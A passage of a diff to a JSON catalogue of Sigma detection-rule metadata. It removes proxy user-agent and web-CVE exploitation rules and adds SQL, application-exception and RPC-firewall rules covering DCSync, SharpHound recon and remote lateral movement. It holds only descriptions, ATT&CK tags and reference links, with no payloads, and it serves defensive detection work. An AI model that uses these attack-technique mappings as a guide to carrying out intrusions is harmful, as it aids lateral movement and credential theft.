"value": "Crypto Miner User Agent" + "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", + "value": "Antivirus Ransomware Detection" }, { - "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", + "description": "Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields", "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", + "author": "@juju4", + "creation_date": "2022/12/27", "falsepositive": [ - "Unknown" + "Inventory and monitoring activity", + "Vulnerability scanners", + "Legitimate applications" ], - "filename": "proxy_ua_frameworks.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", - "value": "Exploit Framework User Agent" - }, - { - "description": "Detects suspicious user agent strings user by hack tools in proxy logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_hacktool.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", - "value": "Hack Tool User Agent" - }, - { - "description": "Detects suspicious user agent strings used by malware in proxy logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_malware.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "http://www.botopedia.org/search?searchword=scan&searchphrase=all", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", - "https://perishablepress.com/blacklist/ua-2013.txt", - "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", - "value": "Malware User Agent" - }, - { - "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", - "meta": { - "author": "Janantha Marasinghe", - "creation_date": "2022/10/18", - "falsepositive": [ - "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" - ], - "filename": "proxy_ua_rclone.yml", + "filename": "db_anomalous_query.yml", "level": "medium", - "logsource.category": "proxy", + "logsource.category": "database", "logsource.product": "No established product", "refs": [ - "https://rclone.org/", - "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" + "https://github.com/sqlmapproject/sqlmap", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/database/db_anomalous_query.yml" ], "tags": [ "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", - "value": "Rclone Activity via Proxy" - }, - { - "description": "Detects suspicious malformed user agent strings in proxy logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_susp.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", - "value": "Suspicious User Agent" - }, - { - "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_susp_base64.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", - "value": "Suspicious Base64 User Agent" - }, - { - "description": "Detects Ursnif C2 traffic.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ursnif_malware_c2_url.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" - ], - "tags": [ "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1204.002", - "attack.command_and_control", - "attack.t1071.001" + "attack.privilege_escalation", + "attack.t1190", + "attack.t1505.001" ] }, - "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", - "value": "Ursnif Malware C2 URL Pattern" + "uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", + "value": "Suspicious SQL Query" }, { - "description": "Detects download of Ursnif malware done by dropper documents.", + "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", "meta": { "author": "Thomas Patzke", - "creation_date": "2019/12/19", + "creation_date": "2017/08/06", "falsepositive": [ - "Unknown" + "Application bugs" ], - "filename": "proxy_ursnif_malware_download_url.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" - ], - "tags": "No established tags" - }, - "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", - "value": "Ursnif Malware Download URL Pattern" - }, - { - "description": "Detects a segmentation fault error message caused by a creashing apache worker process", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/28", - "falsepositive": [ - "Unknown" - ], - "filename": "web_apache_segfault.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "No established product", - "refs": [ - "http://www.securityfocus.com/infocus/1633", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.004" - ] - }, - "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", - "value": "Apache Segmentation Fault" - }, - { - "description": "Detects an issue in apache logs that reports threading related errors", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/22", - "falsepositive": [ - "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" - ], - "filename": "web_apache_threading_error.yml", + "filename": "appframework_spring_exceptions.yml", "level": "medium", - "logsource.category": "No established category", - "logsource.product": "No established product", + "logsource.category": "application", + "logsource.product": "spring", "refs": [ - "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" - ], - "tags": "No established tags" - }, - "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", - "value": "Apache Threading Error" - }, - { - "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n", - "meta": { - "author": "Subhash Popuri (@pbssubhash)", - "creation_date": "2021/08/25", - "falsepositive": [ - "Scanning from Nuclei", - "Unknown" - ], - "filename": "web_cve_2010_5278_exploitation_attempt.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" + "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" ], "tags": [ "attack.initial_access", "attack.t1190" ] }, - "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", - "value": "CVE-2010-5278 Exploitation Attempt" + "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", + "value": "Spring Framework Exceptions" }, { - "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", + "description": "Generic rule for SQL exceptions in Python according to PEP 249", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/19", + "author": "Thomas Patzke", + "creation_date": "2017/08/12", "falsepositive": [ - "Unknown" + "Application bugs" ], - "filename": "web_cve_2014_6287_hfs_rce.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "filename": "app_python_sql_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "python", "refs": [ - "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", - "https://www.exploit-db.com/exploits/39161", - "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" + "https://www.python.org/dev/peps/pep-0249/#exceptions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" ], "tags": [ "attack.initial_access", - "attack.t1190", - "attack.t1505.003", - "cve.2014.6287" + "attack.t1190" ] }, - "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", - "value": "Rejetto HTTP File Server RCE" + "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", + "value": "Python SQL Exceptions" }, { - "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", + "description": "Detects SQL error messages that indicate probing for an injection attack", + "meta": { + "author": "Bjoern Kimminich", + "creation_date": "2017/11/27", + "falsepositive": [ + "Application bugs" + ], + "filename": "app_sqlinjection_errors.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "sql", + "refs": [ + "http://www.sqlinjection.net/errors", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", + "value": "Suspicious SQL Error Messages" + }, + { + "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/06", + "falsepositive": [ + "Application bugs" + ], + "filename": "appframework_ruby_on_rails_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "ruby_on_rails", + "refs": [ + "http://guides.rubyonrails.org/action_controller_overview.html", + "http://edgeguides.rubyonrails.org/security.html", + "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", + "value": "Ruby on Rails Framework Exceptions" + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sharphound_recon_account.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1087/", + "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" + ], + "tags": [ + "attack.t1087" + ] + }, + "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", + "value": "SharpHound Recon Account Discovery" + }, + { + "description": "Detects remote RPC calls to collect information", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administration of registry values" + ], + "filename": "rpc_firewall_remote_registry_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", + "value": "Remote Registry Recon" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_itaskschedulerservice_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", + "value": "Remote Schedule Task Recon via ITaskSchedulerService" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Administrative tasks on remote services" + ], + "filename": "rpc_firewall_remote_service_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1569/002/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1569.002" + ] + }, + "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", + "value": "Remote Server Service Abuse for Lateral Movement" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_atsvc_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://attack.mitre.org/techniques/T1053/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", + "value": "Remote Schedule Task Lateral Movement via ATSvc" + }, + { + "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_dcsync_attack.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" + ], + "tags": [ + "attack.t1033" + ] + }, + "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", + "value": "Possible DCSync Attack" + }, + { + "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administrative tasks on Windows Events" + ], + "filename": "rpc_firewall_eventlog_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/zeronetworks/rpcfirewall", + "https://attack.mitre.org/tactics/TA0007/", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", + "value": "Remote Event Log Recon" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://attack.mitre.org/techniques/T1053/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", + "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" + }, + { + "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Some administrative tasks on remote host" + ], + "filename": "rpc_firewall_remote_dcom_or_wmi.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/zeronetworks/rpcfirewall", + "https://attack.mitre.org/techniques/T1021/003/", + "https://attack.mitre.org/techniques/T1047/", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003", + "attack.t1047" + ] + }, + "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", + "value": "Remote DCOM/WMI Lateral Movement" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sasec_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://attack.mitre.org/techniques/T1053/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", + "value": "Remote Schedule Task Lateral Movement via SASec" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Actual printing" + ], + "filename": "rpc_firewall_printing_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/zeronetworks/rpcfirewall", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", + "value": "Remote Printing Abuse for Lateral Movement" + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sharphound_recon_sessions.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", + "https://attack.mitre.org/techniques/T1033/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" + ], + "tags": [ + "attack.t1033" + ] + }, + "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", + "value": "SharpHound Recon Sessions" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Legitimate usage of remote file encryption" + ], + "filename": "rpc_firewall_efs_abuse.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", + "value": "Remote Encrypting File System Abuse" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sasec_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", + "value": "Recon Activity via SASec" + }, + { + "description": "Detects remote RPC calls to modify the registry and possible execute code", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administration of registry values" + ], + "filename": "rpc_firewall_remote_registry_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://attack.mitre.org/techniques/T1112/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", + "value": "Remote Registry Lateral Movement" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Legitimate remote share creation" + ], + "filename": "rpc_firewall_remote_server_service_abuse.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", + "value": "Remote Server Service Abuse" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", + "meta": { + "author": "Sagie 